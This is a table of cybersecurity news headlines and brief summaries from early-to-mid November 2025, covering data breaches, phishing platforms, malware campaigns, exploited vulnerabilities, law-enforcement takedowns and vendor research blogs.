| 14.11.25 | GlobalLogic warns 10,000 employees of data theft after Oracle breach | GlobalLogic, a provider of digital engineering services part of the Hitachi group, is notifying over 10,000 current and former employees that their data was stolen in an Oracle E-Business Suite (EBS) data breach. | Incindent | |
| 14.11.25 | APT37 hackers abuse Google Find Hub in Android data-wiping attacks | North Korean hackers from the KONNI activity cluster are abusing Google's Find Hub tool to track their targets' GPS positions and trigger remote factory resets of Android devices. | APT | |
| 14.11.25 | Mozilla Firefox gets new anti-fingerprinting defenses | Mozilla announced a major privacy upgrade in Firefox 145 that reduces even more the number of users vulnerable to digital fingerprinting. | Safety | |
| 14.11.25 | Quantum Route Redirect PhaaS targets Microsoft 365 users worldwide | A new phishing automation platform named Quantum Route Redirect is using around 1,000 domains to steal Microsoft 365 users' credentials. | Phishing | |
| 14.11.25 | CISA orders feds to patch Samsung zero-day used in spyware attacks | CISA ordered U.S. federal agencies today to patch a critical Samsung vulnerability that has been exploited in zero-day attacks to deploy LandFall spyware on devices running WhatsApp. | Vulnerebility | |
| 14.11.25 | Yanluowang initial access broker pleaded guilty to ransomware attacks | A Russian national will plead guilty to acting as an initial access broker (IAB) for Yanluowang ransomware attacks that targeted at least eight U.S. companies between July 2021 and November 2022. | Ransom | |
| 14.11.25 | Popular JavaScript library expr-eval vulnerable to RCE flaw | A critical vulnerability in the popular expr-eval JavaScript library, with over 800,000 weekly downloads on NPM, can be exploited to execute code remotely through maliciously crafted input. | Vulnerebility | |
| 14.11.25 | How to use the new Windows 11 Start menu, now rolling out | The Windows Start menu is getting its first major redesign since 2021 and will be rolled out to everyone with the November 11 Patch Tuesday update. | OS | |
| 14.11.25 | NAKIVO Introduces v11.1 with Upgraded Disaster Recovery and MSP Features | NAKIVO Backup & Replication v11.1 expands disaster recovery with real-time replication, enhanced Proxmox VE support, and granular physical backups. The update adds MSP Direct Connect for secure client management and a multilingual interface supporting seven languages. | Safety | |
| 14.11.25 | Lost iPhone? Don’t fall for phishing texts saying it was found | The Swiss National Cyber Security Centre (NCSC) is warning iPhone owners about a phishing scam that claims to have found your lost or stolen iPhone but is actually trying to steal your Apple ID credentials. | Phishing | |
| 14.11.25 | Dangerous runC flaws could allow hackers to escape Docker containers | Three newly disclosed vulnerabilities in the runC container runtime used in Docker and Kubernetes could be exploited to bypass isolation restrictions and get access to the host system. | Vulnerebility | |
| 14.11.25 | Ransomware's Fragmentation Reaches a Breaking Point While LockBit Returns | Key Takeaways: 85 active ransomware and extortion groups observed in Q3 2025, reflecting the most decentralized ransomware ecosystem to date. 1,590 victims disclosed across 85 | Ransom | The Hacker News |
| 14.11.25 | Chinese Hackers Use Anthropic's AI to Launch Automated Cyber Espionage Campaign | State-sponsored threat actors from China used artificial intelligence (AI) technology developed by Anthropic to orchestrate automated cyber attacks as part of a "highly | AI | The Hacker News |
| 14.11.25 | Now-Patched Fortinet FortiWeb Flaw Exploited in Attacks to Create Admin Accounts | Cybersecurity researchers are sounding the alert about an authentication bypass vulnerability in Fortinet Fortiweb WAF that could allow an attacker to take over admin accounts and | Vulnerebility | The Hacker News |
| 14.11.25 | Russian Hackers Create 4,300 Fake Travel Sites to Steal Hotel Guests' Payment Data | A Russian-speaking threat behind an ongoing, mass phishing campaign has registered more than 4,300 domain names since the start of the year. The activity , per Netcraft security | Phishing | The Hacker News |
| 13.11.25 | Fake Chrome Extension "Safery" Steals Ethereum Wallet Seed Phrases Using Sui Blockchain | Cybersecurity researchers have uncovered a malicious Chrome extension that poses as a legitimate Ethereum wallet but harbors functionality to exfiltrate users' seed phrases. The | Cryptocurrency | The Hacker News |
| 13.11.25 | Operation Endgame Dismantles Rhadamanthys, Venom RAT, and Elysium Botnet in Global Crackdown | Malware families like Rhadamanthys Stealer , Venom RAT , and the Elysium botnet have been disrupted as part of a coordinated law enforcement operation led by Europol and Eurojust. | Virus | The Hacker News |
| 13.11.25 | ThreatsDay Bulletin: Cisco 0-Days, AI Bug Bounties, Crypto Heists, State-Linked Leaks and 20 More Stories | Behind every click, there's a risk waiting to be tested. A simple ad, email, or link can now hide something dangerous. Hackers are getting smarter, using new tools to sneak past filters and | Cyber | The Hacker News |
| 13.11.25 | CISA Flags Critical WatchGuard Fireware Flaw Exposing 54,000 Fireboxes to No-Login Attacks | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a critical security flaw impacting WatchGuard Fireware to its Known Exploited Vulnerabilities ( | Exploit | The Hacker News |
| 13.11.25 | Over 67,000 Fake npm Packages Flood Registry in Worm-Like Spam Attack | Cybersecurity researchers are calling attention to a large-scale spam campaign that has flooded the npm registry with thousands of fake packages since early 2024 as part of a likely | Spam | The Hacker News |
| 13.11.25 | Google Sues China-Based Hackers Behind $1 Billion Lighthouse Phishing Platform | Google has filed a civil lawsuit in the U.S. District Court for the Southern District of New York (SDNY) against China-based hackers who are behind a massive Phishing-as-a-Service | Phishing | The Hacker News |
| 12.11.25 | Amazon Uncovers Attacks Exploited Cisco ISE and Citrix NetScaler as Zero-Day Flaws | Amazon's threat intelligence team on Wednesday disclosed that it observed an advanced threat actor exploiting two then-zero-day security flaws in Cisco Identity Service Engine (ISE) | Exploit | The Hacker News |
| 12.11.25 | Microsoft Fixes 63 Security Flaws, Including a Windows Kernel Zero-Day Under Active Attack | Microsoft on Tuesday released patches for 63 new security vulnerabilities identified in its software, including one that has come under active exploitation in the wild. Of the 63 flaws, | OS | The Hacker News |
| 12.11.25 | Google Launches 'Private AI Compute' — Secure AI Processing with On-Device-Level Privacy | Google on Tuesday unveiled a new privacy-enhancing technology called Private AI Compute to process artificial intelligence (AI) queries in a secure platform in the cloud. The company | AI | The Hacker News |
| 12.11.25 | WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks | Threat hunters have uncovered similarities between a banking malware called Coyote and a newly disclosed malicious program dubbed Maverick that has been propagated via | Virus | The Hacker News |
| 12.11.25 | GootLoader Is Back, Using a New Font Trick to Hide Malware on WordPress Sites | The malware known as GootLoader has resurfaced yet again after a brief spike in activity earlier this March, according to new findings from Huntress. The cybersecurity company said | Virus | The Hacker News |
| 11.11.25 | Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories | Cybersecurity researchers have discovered a malicious npm package named "@acitons/artifact" that typosquats the legitimate " @actions/artifact " package with the | Virus | The Hacker News |
| 11.11.25 | Android Trojan 'Fantasy Hub' Malware Service Turns Telegram Into a Hub for Hackers | Cybersecurity researchers have disclosed details of a new Android remote access trojan (RAT) called Fantasy Hub that's sold on Russian-speaking Telegram channels under a | Virus | The Hacker News |
| 11.11.25 | No Place Like Localhost: Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480 | Mandiant Threat Defense has uncovered exploitation of an unauthenticated access vulnerability within Gladinet’s Triofox file-sharing and remote access platform. | Vulnerebility blog | Google Threat Intelligence |
| 11.11.25 | Hackers Exploiting Triofox Flaw to Install Remote Access Tools via Antivirus Feature | Google's Mandiant Threat Defense on Monday said it discovered n-day exploitation of a now-patched security flaw in Gladinet's Triofox file-sharing and remote access platform. The | Exploit | The Hacker News |
| 11.11.25 | Konni Hackers Turn Google's Find Hub into a Remote Data-Wiping Weapon | The North Korea-affiliated threat actor known as Konni (aka Earth Imp, Opal Sleet, Osmium, TA406, and Vedalia) has been attributed to a new set of attacks targeting both Android and | APT | The Hacker News |
| 10.11.25 | Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware | Cybersecurity researchers have called attention to a massive phishing campaign targeting the hospitality industry that lures hotel managers to ClickFix-style pages and harvest their | Virus | The Hacker News |
| 10.11.25 | GlassWorm Malware Discovered in Three VS Code Extensions with Thousands of Installs | Cybersecurity researchers have disclosed a new set of three extensions associated with the GlassWorm campaign, indicating continued attempts on part of threat actors to target the | Virus | The Hacker News |
| 9.11.25 | GlassWorm malware returns on OpenVSX with 3 new VSCode extensions | The GlassWorm malware campaign, which impacted the OpenVSX and Visual Studio Code marketplaces last month, has returned with three new VSCode extensions that have already been downloaded over 10,000 times. | Virus | |
| 9.11.25 | Still on Windows 10? Enroll in free ESU before next week’s Patch Tuesday | With the first Patch Tuesday following Windows 10's end of support approaching next week, users who continue to run the operating system should enroll in the Extended Security Updates (ESU) program to remain protected against newly discovered security vulnerabilities. | OS | |
| 9.11.25 | Malicious NuGet packages drop disruptive 'time bombs' | Several malicious packages on NuGet have sabotage payloads scheduled to activate in 2027 and 2028, targeting database implementations and Siemens S7 industrial control devices. | Hack | |
| 9.11.25 | Microsoft testing faster Quick Machine Recovery in Windows 11 | Microsoft is testing a faster version of Quick Machine Recovery (QMR) and updated Smart App Control (SAC), allowing users to toggle it without requiring a Windows clean install. | OS | |
| 9.11.25 | QNAP fixes seven NAS zero-day flaws exploited at Pwn2Own | QNAP has fixed seven zero-day vulnerabilities that security researchers exploited to hack QNAP network-attached storage (NAS) devices during the Pwn2Own Ireland 2025 competition. | Exploit | |
| 9.11.25 | New LandFall spyware exploited Samsung zero-day via WhatsApp messages | A threat actor exploited a zero-day vulnerability in Samsung's Android image processing library to deploy a previously unknown spyware called 'LandFall' using malicious images sent over WhatsApp. | Exploit | |
| 9.11.25 | Cisco: Actively exploited firewall flaws now abused for DoS attacks | Cisco warned this week that two vulnerabilities, which have been exploited in zero-day attacks, are now being abused to force ASA and FTD firewalls into reboot loops. | Exploit | |
| 9.11.25 | ID verification laws are fueling the next wave of breaches | ID laws are forcing companies to store massive amounts of sensitive data, turning compliance into a security risk. Acronis explains how integrated backup and cybersecurity platforms help MSPs reduce complexity and close the gaps attackers exploit. | Incindent | |
| 9.11.25 | U.S. Congressional Budget Office hit by suspected foreign cyberattack | The U.S. Congressional Budget Office (CBO) confirms it suffered a cybersecurity incident after a suspected foreign hacker breached its network, potentially exposing sensitive data. | Cyber | |
| 9.11.25 | AI-Slop ransomware test sneaks on to VS Code marketplace | A malicious extension with basic ransomware capabilities seemingly created with the help of AI, has been published on Microsoft's official VS Code marketplace. | Ransom | |
| 9.11.25 | How a ransomware gang encrypted Nevada government's systems | The State of Nevada has completed its recovery from a ransomware attack it suffered on August 24, 2025, which impacted 60 state agencies, disrupting critical services related to health and public safety. | Ransom | |
| 9.11.25 | Continuous Purple Teaming: Turning Red-Blue Rivalry into Real Defense | Red and blue teams often operate independently, but attackers don't. Picus Security shows how continuous purple teaming and BAS turn red-blue rivalry into real defense, validating controls and closing gaps in real time. | Cyber | |
| 9.11.25 | ClickFix malware attacks evolve with multi-OS support, video tutorials | ClickFix attacks have evolved to feature videos that guide victims through the self-infection process, a timer to pressure targets into taking risky actions, and automatic detection of the operating system to provide the correct commands. | Virus | |
| 9.11.25 | Critical Cisco UCCX flaw lets attackers run commands as root | Cisco has released security updates to patch a critical vulnerability in the Unified Contact Center Express (UCCX) software, which could enable attackers to execute commands with root privileges. | Vulnerebility | |
| 9.11.25 | Sandworm hackers use data wipers to disrupt Ukraine's grain sector | Russian state-backed hacker group Sandworm has deployed multiple data-wiping malware families in attacks targeting Ukraine's education, government, and the grain sector, the country's main revenue source. | Virus | |
| 9.11.25 | Gootloader malware is back with new tricks after 7-month break | The Gootloader malware loader operation has returned after a 7-month absence and is once again performing SEO poisoning to promote fake websites that distribute the malware. | Virus | |
| 9.11.25 | Hyundai AutoEver America data breach exposes SSNs, drivers licenses | Hyundai AutoEver America is notifying individuals that hackers breached the company's IT environment and gained access to personal information. | Incindent | |
| 9.11.25 | CISA warns of critical CentOS Web Panel bug exploited in attacks | The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning that threat actors are exploiting a critical remote command execution flaw in CentOS Web Panel (CWP). | Exploit | |
| 9.11.25 | Windows 11 Store gets Ninite-style multi-app installer feature | The Microsoft Store on the web now lets you create a multi-app install package on Windows 11 that installs multiple applications from a single installer. | OS | |
| 9.11.25 | SonicWall says state-sponsored hackers behind September security breach | SonicWall's investigation into the September security breach that exposed customers' firewall configuration backup files concludes that state-sponsored hackers were behind the attack. | Incindent | |
| 9.11.25 | UK carriers to block spoofed phone numbers in fraud crackdown | Under a new partnership with the government aimed at combating fraud, Britain's largest mobile carriers have committed to upgrading their networks to eliminate scammers' ability to spoof phone numbers within a year. | CyberCrime | |
| 9.11.25 | University of Pennsylvania confirms data stolen in cyberattack | The University of Pennsylvania has confirmed that a hacker breached numerous internal systems related to the university's development and alumni activities and stole data in a cyberattack. | Incindent | |
| 9.11.25 | Cyber theory vs practice: Are you navigating with faulty instruments? | Security teams rely on dashboards and data feeds, but outdated or fragmented tools leave dangerous blind spots across assets, vulnerabilities, and credentials. Learn how Outpost24's CompassDRP unifies EASM and DRP to reveal what attackers see and what's already exposed. | Vulnerebility | |
| 9.11.25 | Google warns of new AI-powered malware families deployed in the wild | Google's Threat Intelligence Group (GTIG) has identified a major shift this year, with adversaries leveraging artificial intelligence to deploy new malware families that integrate large language models (LLMs) during execution. | AI | |
| 9.11.25 | Police busts credit card fraud rings with 4.3 million victims | International authorities have dismantled three massive credit card fraud and money laundering networks, linked to losses exceeding €300 million ($344 million) and affecting over 4.3 million cardholders across 193 countries. | CyberCrime | |
| 9.11.25 | US sanctions North Korean bankers linked to cybercrime, IT worker fraud | The U.S. Treasury Department imposed sanctions on two North Korean financial institutions and eight individuals involved in laundering cryptocurrency stolen in cybercrime and fraudulent IT worker schemes. | APT | |
| 9.11.25 | Microsoft: October Windows updates trigger BitLocker recovery | Microsoft has warned that some systems may boot into BitLocker recovery after installing the October 2025 Windows security updates. | OS | |
| 9.11.25 | Hackers exploit WordPress plugin Post SMTP to hijack admin accounts | Threat actors are actively exploiting a critical vulnerability in the Post SMTP plugin installed on more than 400,000 WordPress sites, to take complete control by hijacking administrator accounts. | Exploit | |
| 9.11.25 | Apache OpenOffice disputes data breach claims by ransomware gang | The Apache Software Foundation disputes claims that its OpenOffice project suffered an Akira ransomware attack, after the threat actors claimed to have stolen 23 GB of corporate documents. | Ransom | |
| 9.11.25 | Malicious Android apps on Google Play downloaded 42 million times | Hundreds of malicious Android apps on Google Play were downloaded more than 40 million times between June 2024 and May 2025, notes a report from cloud security company Zscaler. | Virus | |
| 8.11.25 | Microsoft Uncovers 'Whisper Leak' Attack That Identifies AI Chat Topics in Encrypted Traffic | Microsoft has disclosed details of a novel side-channel attack targeting remote language models that could enable a passive adversary with capabilities to observe network traffic to | AI | The Hacker News |
| 8.11.25 | Microsoft removing Defender Application Guard from Office | Microsoft plans to remove Defender Application Guard from Office by December 2027, starting with the February 2026 release of Office version 2602. | Security | |
| 8.11.25 | Data breach at major Swedish software supplier impacts 1.5 million | The Swedish Authority for Privacy Protection (IMY) is investigating a cyberattack on IT systems supplier Miljödata that exposed data belonging to 1.5 million people. | Incindent | |
| 8.11.25 | Media giant Nikkei reports data breach impacting 17,000 people | Japanese publishing giant Nikkei announced earlier today that its Slack messaging platform had been compromised, exposing the personal information of over 17,000 employees and business partners. | Incindent | |
| 8.11.25 | Police arrests suspects linked to €600 million crypto fraud ring | European law enforcement authorities have arrested nine suspected money launderers who set up a cryptocurrency fraud network that stole over €600 million ($689 million) from victims across multiple countries. | CyberCrime | |
| 8.11.25 | The Top 3 Browser Sandbox Threats That Slip Past Modern Security Tools | Attackers exploit web browsers' built-in behaviors to steal credentials, abuse extensions, and move laterall, slipping past traditional defenses. Learn from Keep Aware how browser-layer visibility and policy enforcement stop these hidden threats in real time. | Safety | |
| 8.11.25 | Russian hackers abuse Hyper-V to hide malware in Linux VMs | The Russian hacker group Curly COMrades is abusing Microsoft Hyper-V in Windows to bypass endpoint detection and response solutions by creating a hidden Alpine Linux-based virtual machine to run malware. | Virus | |
| 8.11.25 | Windows 10 update bug triggers incorrect end-of-support alerts | Microsoft says the October 2025 updates trigger incorrect end-of-support warnings on Windows 10 systems with active security coverage or still under active support. | OS | |
| 8.11.25 | Hackers exploit critical auth bypass flaw in JobMonster WordPress theme | Threat actors are targeting a critical vulnerability in the JobMonster WordPress theme that allows hijacking of administrator accounts under certain conditions. | Exploit | |
| 8.11.25 | Hacker steals over $120 million from Balancer DeFi crypto protocol | The Balancer Protocol announced that hackers had targeted its v2 pools, with losses reportedly estimated to be more than $128 million. | Incindent | |
| 8.11.25 | Fake Solidity VSCode extension on Open VSX backdoors developers | A remote access trojan dubbed SleepyDuck, and disguised as the well-known Solidity extension in the Open VSX open-source registry, uses an Ethereum smart contract to establish a communication channel with the attacker. | Virus | |
| 8.11.25 | Microsoft: SesameOp malware abuses OpenAI Assistants API in attacks | Microsoft security researchers have discovered a new backdoor malware that uses the OpenAI Assistants API as a covert command-and-control channel. | Virus | |
| 8.11.25 | US cybersecurity experts indicted for BlackCat ransomware attacks | Three former employees of cybersecurity incident response companies DigitalMint and Sygnia have been indicted for allegedly hacking the networks of five U.S. companies in BlackCat (ALPHV) ransomware attacks between May 2023 and November 2023. | Ransom | |
| 8.11.25 | Hackers use RMM tools to breach freighters and steal cargo shipments | Threat actors are targeting freight brokers and trucking carriers with malicious links and emails to deploy remote monitoring and management tools (RMMs) that enable them to hijack cargo and steal physical goods. | Incindent | |
| 8.11.25 | Microsoft: Patch for WSUS flaw disabled Windows Server hotpatching | An out-of-band (OOB) security update that patches an actively exploited Windows Server Update Service (WSUS) vulnerability has broken hotpatching on some Windows Server 2025 devices. | OS | |
| 8.11.25 | OAuth Device Code Phishing: Azure vs. Google Compared | Device code phishing abuses the OAuth device flow, and Google and Azure produce strikingly different attack surfaces. Register for Huntress Labs' Live Hack to learn about attack techniques, defensive tactics, and get an Identity Security Assessment. | Security | |
| 8.11.25 | Microsoft: Windows Task Manager won’t quit after KB5067036 update | Microsoft has confirmed a known issue that is preventing users from quitting the Windows 11 Task Manager after installing the October 2025 optional update. | OS | |
| 8.11.25 | How PowerShell Gallery simplifies attacks | PowerShell Gallery’s Install-Module command presents one key link in the kill chain of a possible attack. | Hacking blog | REVERSINGLABS |
| 8.11.25 | China-linked Actors Maintain Focus on Organizations Influencing U.S. Policy | Recent compromise of a non-profit organization reflects continued interest in U.S. policy. | APT blog | SECURITY.COM |
| 8.11.25 | Mastering DORA’s Five Pillars with Preemptive Cyber Defense | The Digital Operational Resilience Act (DORA) represents a paradigm shift for the EU’s financial sector. No longer is a reactive security posture enough. DORA mandates a comprehensive, proactive, and testable framework for managing ICT risk and ensuring digital operational resilience. | Cyber blog | Silent Push |
| 8.11.25 | Every November, we make it our mission to equip organizations with the knowledge needed to stay ahead of threats we anticipate in the coming year. The Cybersecurity Forecast 2026 report, released today, provides comprehensive insights to help security leaders and teams prepare for those challenges. | Cyber blog | Google Threat Intelligence | |
| 8.11.25 | Privileged access stands as the most critical pathway for adversaries seeking to compromise sensitive systems and data. Its protection is not only a best practice, it is a fundamental imperative for organizational resilience | Cyber blog | Google Threat Intelligence | |
| 8.11.25 | Google Threat Intelligence Group (GTIG) is tracking a cluster of financially motivated threat actors operating from Vietnam that leverages fake job postings on legitimate platforms to target individuals in the digital advertising and marketing sectors. | APT blog | Google Threat Intelligence | |
| 8.11.25 | Key Highlights XLoader 8.0 malware is one of the most evasive and persistent information stealers ... | Malware blog | CHECKPOINT | |
| 8.11.25 | Trust alone isn’t a security strategy. That’s the key lesson from new research by Check ... | Exploit blog | CHECKPOINT | |
| 8.11.25 | Introduction Over the past few months, we identified an emerging online threat that combines fraud, ... | AI blog | CHECKPOINT | |
| 8.11.25 | Australia Strengthens Regional Cyber Partnerships to Bolster Security Across the Asia-Pacific | Australia, through ACSC and Cyber Affairs and Critical Technology, strengthens Asia-Pacific cybersecurity via PaCSON, APCERT, and regional threat-sharing initiatives. | BigBrother blog | Cyble |
| 8.11.25 | South Africa Launches Pilot for Secure Data Exchange Among Government Agencies | South Africa’s MzansiXchange initiative, led by the National Treasury, is pioneering secure data exchange across government. | BigBrother blog | Cyble |
| 8.11.25 | Software Supply Chain Attacks Surge to Record High in October 2025 | Software supply chain attacks in October were 32% above previous records, according to Cyble data. | Hacking blog | Cyble |
| 8.11.25 | The Week in Vulnerabilities: Cyble Urges Apache, Microsoft Fixes | This week’s vulnerability report examines 15 IT and ICS flaws at high risk of exploitation by threat actors. | Vulnerebility blog | Cyble |
| 8.11.25 | Securing India’s Financial Future: Why the DPDP Act is a Game-Changer for BFSI | India’s Banking, Financial Services, and Insurance (BFSI) industry stands at the intersection of innovation and risk. From UPI and digital wallets to AI-based lending and predictive underwriting, digital transformation is no longer a differentiator — it’s the operating model. | Cyber blog | Seqrite |
| 8.11.25 | Operation Peek-a-Baku: Silent Lynx APT makes sluggish shift to Dushanbe | Introduction Timeline Key Targets. Industries Affecte d. Geographical Focus. Infection Chain. Initial Findings. Technical Analysis. Campaign – I The LNK Way. Malicious SILENT LOADER Malicious LAPLAS Implant – TCP & TLS. Malicious .NET Implant – SilentSweeper Campaign –.. | APT blog | Seqrite |
| 8.11.25 | TRACKING RANSOMWARE : OCTOBER 2025 | EXECUTIVE SUMMARY In October 2025, ransomware activity surged globally, marking a significant resurgence after a period of mid-year stability. Victim counts climbed to 738, | Ransom blog | Cyfirma |
| 8.11.25 | Fortnightly Vulnerability Summary | Fortnightly Vulnerability Summary CHECK OUT THESE FAST FACTS ON FORTNIGHTLY OBSERVED VULNERABILITIES. Fortnight's Most Impacted Products D-Link | Tenda | Jira Increase in | Vulnerebility blog | Cyfirma |
| 8.11.25 | Rising Cyber Threats to Rwanda : Hacktivists and Data Breaches | EXECUTIVE SUMMARY Between January and October 2025, Rwanda’s government infrastructure experienced a series of coordinated cyber incidents involving data leaks, credential | Cyber blog | Cyfirma |
| 8.11.25 | Cyber Threat Landscape – The United Republic of Tanzania | EXECUTIVE SUMMARY Tanzania’s cyber threat landscape has escalated in 2025, reflecting its growing digital transformation, expanding telecom sector, and increasing reliance on online platforms for governance, commerce, and public services.… | Cyber blog | Cyfirma |
| 8.11.25 | Survey of AFCEA Attendees Shows Government Shutdown Has Major Impact on Cybersecurity Readiness | The results are in from the Eclypsium survey of over 100 government employees and affiliated entities about cybersecurity risk to the U.S. Federal government and Department of Defense. | Cyber blog | Eclypsium |
| 8.11.25 | The Future of F5 Risk In The Enterprise | The major F5 security incident disclosed on October 15 is still sending ripples (or tsunamis) through the enterprises and governments worldwide. While F5 has issued patches for 44 vulnerabilities that were leaked to attackers during the breach, major concerns still linger about undiscovered or undisclosed risks to F5’s customers. | Cyber blog | Eclypsium |
| 8.11.25 | Crossed wires: a case study of Iranian espionage and attribution | In June, Proofpoint Threat Research began investigating a benign email discussing economic uncertainty and domestic political unrest in Iran. While coinciding with the escalations in the Iran-Israel conflict, there was no indication that the observed activity was directly correlated with Israel’s attacks on Iranian nuclear facilities or Iran’s actions in response. | BigBrother blog | PROOFPOINT |
| 8.11.25 | Insiders, AI, and data sprawl converge: essential insights from the 2025 Data Security Landscape report | Data security is at a critical inflection point. Organizations today are struggling with explosive data growth, sprawling IT environments, persistent insider risks, and the adoption of generative AI (GenAI). What’s more, the rapid emergence of AI agents is giving rise to a new, more complex agentic workspace, where both humans and agents interact with sensitive data. | AI blog | PROOFPOINT |
| 8.11.25 | Remote access, real cargo: cybercriminals targeting trucking and logistics | Proofpoint is tracking a cluster of cybercriminal activity that targets trucking and logistics companies and infects them with RMM tooling for financial gain. Based on our ongoing investigations paired with open-source information, Proofpoint assesses with high confidence that the threat actors are working with organized crime groups to compromise entities in the surface transportation industry — in particular trucking carriers and freight brokers — to hijack cargo freight, leading to the theft of physical goods. | Cyber blog | PROOFPOINT |
| 8.11.25 | SesameOp: Novel backdoor uses OpenAI Assistants API for command and control | Microsoft Incident Response – Detection and Response Team (DART) researchers uncovered a new backdoor that is notable for its novel use of the OpenAI Assistants Application Programming Interface (API) as a mechanism for command-and-control (C2) communications. | AI blog | Microsoft blog |
| 8.11.25 | LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices | Unit 42 researchers have uncovered a previously unknown Android spyware family, which we have named LANDFALL. To deliver the spyware, attackers exploited a zero-day vulnerability (CVE-2025-21042) in Samsung’s Android image processing library. The specific flaw LANDFALL exploited, CVE-2025-21042, is not an isolated case but rather part of a broader pattern of similar issues found on multiple mobile platforms. | Malware blog | Palo Alto |
| 8.11.25 | Know Ourselves Before Knowing Our Enemies: Threat Intelligence at the Expense of Asset Management | Cyber threat intelligence is often touted as a way to help defend an organization's IT environment. If we better understand the threats that might target our networks, we can better defend ourselves against those threats. This is true, but threat intelligence is only effective if an organization also properly manages its IT assets. | Cyber blog | Palo Alto |
| 8.11.25 | Microsoft WSUS Remote Code Execution (CVE-2025-59287) Actively Exploited in the Wild (Updated November 3) | On Oct. 14, 2025, a critical, unauthenticated remote code execution (RCE) vulnerability was identified in Microsoft's Windows Server Update Services (WSUS), a core enterprise component for patch management | Vulnerebility blog | Palo Alto |
| 8.11.25 | Exploiting Microsoft Teams: Impersonation and Spoofing Vulnerabilities Exposed | Check Point Research uncovered four vulnerabilities in Microsoft Teams that allow attackers to impersonate executives, manipulate messages, alter notifications, and forge identities in video and audio calls. | Exploit blog | CHECKPOINT |
| 8.11.25 | Drawn to Danger: Windows Graphics Vulnerabilities Lead to Remote Code Execution and Memory Exposure | Check Point Research (CPR) identified three security vulnerabilities in the Graphics Device Interface (GDI) in Windows. We promptly reported these issues to Microsoft, and they were addressed in the Patch Tuesday updates in May, July, and August 2025. | Vulnerebility blog | CHECKPOINT |
| 8.11.25 | Beating XLoader at Speed: Generative AI as a Force Multiplier for Reverse Engineering | XLoader remains one of the most challenging malware families to analyze. Its code decrypts only at runtime and is protected by multiple layers of encryption, each locked with a different key hidden somewhere else in the binary. Even sandboxes are no help: evasions block malicious branches, and the real C2 (command and control) domains are buried among dozens of fakes. With new versions released faster than researchers can investigate, analysis is almost always a (losing) race against time. | AI blog | CHECKPOINT |
| 8.11.25 | Do robots dream of secure networking? Teaching cybersecurity to AI systems | This blog demonstrates a proof of concept using LangChain and OpenAI, integrated with Cisco Umbrella API, to provide AI agents with real-time threat intelligence for evaluating domain dispositions. | AI blog | CISCO TALOS |
| 8.11.25 | Remember, remember the fifth of November | This edition, Hazel explores the origins of Guy Fawkes Day and how heeding an anonymous warning prevented an assassination. | Cyber blog | CISCO TALOS |
| 8.11.25 | Dynamic binary instrumentation (DBI) with DynamoRio | Learn how to build your own dynamic binary instrumentation (DBI) tool with open-source DynamoRIO to enable malware analysis, security auditing, reverse engineering, and more. | Hacking blog | CISCO TALOS |
| 8.11.25 | In memoriam: David Harley | Former colleagues and friends remember the cybersecurity researcher, author, and mentor whose work bridged the human and technical sides of security | Cyber blog | Eset |
| 8.11.25 | The who, where, and how of APT attacks in Q2 2025–Q3 2025 | ESET Chief Security Evangelist Tony Anscombe highlights some of the key findings from the latest issue of the ESET APT Activity Report | APT blog | Eset |
| 8.11.25 | ESET APT Activity Report Q2 2025–Q3 2025 | An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q2 2025 and Q3 2025 | APT blog | Eset |
| 8.11.25 | Sharing is scaring: The WhatsApp screen-sharing scam you didn’t see coming | How a fast-growing scam is tricking WhatsApp users into revealing their most sensitive financial and other data | Social blog | Eset |
| 8.11.25 | How social engineering works | Unlocked 403 cybersecurity podcast (S2E6) | Think you could never fall for an online scam? Think again. Here's how scammers could exploit psychology to deceive you – and what you can do to stay one step ahead | Cyber blog | Eset |
| 8.11.25 | Ground zero: 5 things to do after discovering a cyberattack | When every minute counts, preparation and precision can mean the difference between disruption and disaster | Cyber blog | Eset |
| 8.11.25 | Tycoon 2FA Phishing Kit Analysis | In this Threat Alert, Cybereason analyzes Tycoon 2FA phishing kit, a sophisticated phishing-as-a-service platform designed to bypass two-factor authentication. | Phishing blog | Cybereason |
| 8.11.25 | Defeating KASLR by Doing Nothing at All | I've recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping. | Vulnerebility blog | Project Zero |
| 8.11.25 | Samsung Mobile Flaw Exploited as Zero-Day to Deploy LANDFALL Android Spyware | A now-patched security flaw in Samsung Galaxy Android devices was exploited as a zero-day to deliver a "commercial-grade" Android spyware dubbed LANDFALL in targeted attacks in the | Exploit | The Hacker News |
| 8.11.25 | From Log4j to IIS, China's Hackers Turn Legacy Bugs into Global Espionage Tools | A China-linked threat actor has been attributed to a cyber attack targeting an U.S. non-profit organization with an aim to establish long-term persistence, as part of broader activity aimed | APT | The Hacker News |
| 7.11.25 | Hidden Logic Bombs in Malware-Laced NuGet Packages Set to Detonate Years After Installation | A set of nine malicious NuGet packages has been identified as capable of dropping time-delayed payloads to sabotage database operations and corrupt industrial control systems. | Virus | The Hacker News |
| 7.11.25 | Google Launches New Maps Feature to Help Businesses Report Review-Based Extortion Attempts | Google on Thursday said it's rolling out a dedicated form to allow businesses listed on Google Maps to report extortion attempts made by threat actors who post inauthentic bad | Cyber | The Hacker News |
| 7.11.25 | Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities | Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to be created with the help of artificial | Ransom | The Hacker News |
| 7.11.25 | Trojanized ESET Installers Drop Kalambur Backdoor in Phishing Attacks on Ukraine | A previously unknown threat activity cluster has been observed impersonating Slovak cybersecurity company ESET as part of phishing attacks targeting Ukrainian entities. The | Virus | The Hacker News |
| 7.11.25 | Cisco Warns of New Firewall Attack Exploiting CVE-2025-20333 and CVE-2025-20362 | Cisco on Wednesday disclosed that it became aware of a new attack variant that's designed to target devices running Cisco Secure Firewall Adaptive Security Appliance (ASA) Software | Exploit | The Hacker News |
| 6.11.25 | From Tabletop to Turnkey: Building Cyber Resilience in Financial Services | Introduction Financial institutions are facing a new reality: cyber-resilience has passed from being a best practice, to an operational necessity, to a prescriptive regulatory requirement. | Cyber | The Hacker News |
